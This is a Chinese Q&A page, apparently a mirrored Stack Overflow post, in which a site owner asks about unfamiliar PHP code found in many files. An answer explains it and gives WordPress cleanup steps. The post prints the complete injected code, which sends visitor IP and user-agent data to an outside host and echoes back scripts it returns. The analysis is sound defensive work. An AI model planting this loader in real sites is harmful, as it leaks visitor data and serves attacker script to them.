php - 我网站上的这个 PHP 代码有什么作用?
问题描述
我已经安装了一个小项目网站,现在在我的许多 PHP 文件中找到了这个代码。我不知道它做了什么,它不在我曾经安装的源代码中。我不知道它是从哪里来的:
<?php
#68fa27#
error_reporting(0);
ini_set('display_errors',0);
$wp_mrgv474 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_mrgv474) && !preg_match ('/bot/i', $wp_mrgv474))){
$wp_mrgv09474="http://"."html"."value".".com/value"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_mrgv474);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_mrgv09474);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch,
CURLOPT_RETURNTRANSFER, 1);
$wp_474mrgv = curl_exec ($ch);
curl_close($ch);
}
if ( substr($wp_474mrgv,1,3) === 'scr' ){
echo $wp_474mrgv;
}
#/68fa27#
?>
如果有人可以在这里帮助我,那就太好了。
提前致谢。
解决方案
- 它首先禁用错误。
- 检查 user_agent,如果它不包含机器人,它会将 ip 地址、引用者和用户代理作为参数发送到http://htmlvalue.com/value
- 如果最后一次调用的答案在开头有“scr”,它将显示答案(似乎它可能会返回
<script>
......所以它执行从该站点返回的 javascript 代码)。
更多信息可以在这里找到:https ://www.linuxquestions.org/questions/linux-security-4/server-attacked-code-4175494334/
https://wordpress.org/support/topic/headerphp-was-hacked/#post-5058987
在这里: https ://www.themenmix.de/wordpress-virus-die-code-analysis/
我会遵循以下说明:
去掉 PHP 顶行中的脚本后保存原来的 wp-config.php 和 custom-functions.php。
下载并安装最新版本的 WordPress 的全新副本。
删除所有插件并从 WordPress 管理面板中重新安装它们(仅限那些看起来安全的插件)。
更改 WordPress 和 FTP 登录密码以(希望)保护站点免受进一步攻击。
来自https://techjaws.com/php-script-injection-exploit-in-wordpress-271/的细微改动。
推荐阅读
- flutter - 如何在 Flutter 中不使用 Firebase 向用户发送短信验证码
- python - 在 iterrows 循环中修改 pandas 数据框
- python - 如何在不使用 Django 默认登录表单的情况下登录?
- php - 根据 Woocommerce 购物车中超过 40 欧元的产品数量添加运费。额外费用因运送国家而异
- python - 查找列表中的连续项目
- mongodb - 为什么 MongoDB compact 命令会增加集合的大小?
- javascript - 如何在我的 node.js 中使用地理位置来获取用户设备的纬度/经度
- python - 最小化的基于 Tkinter 的程序中的热键
- regex - 如何制作正则表达式来验证用户名
- c++ - 在 C++ 中的函数参数中使用任何类型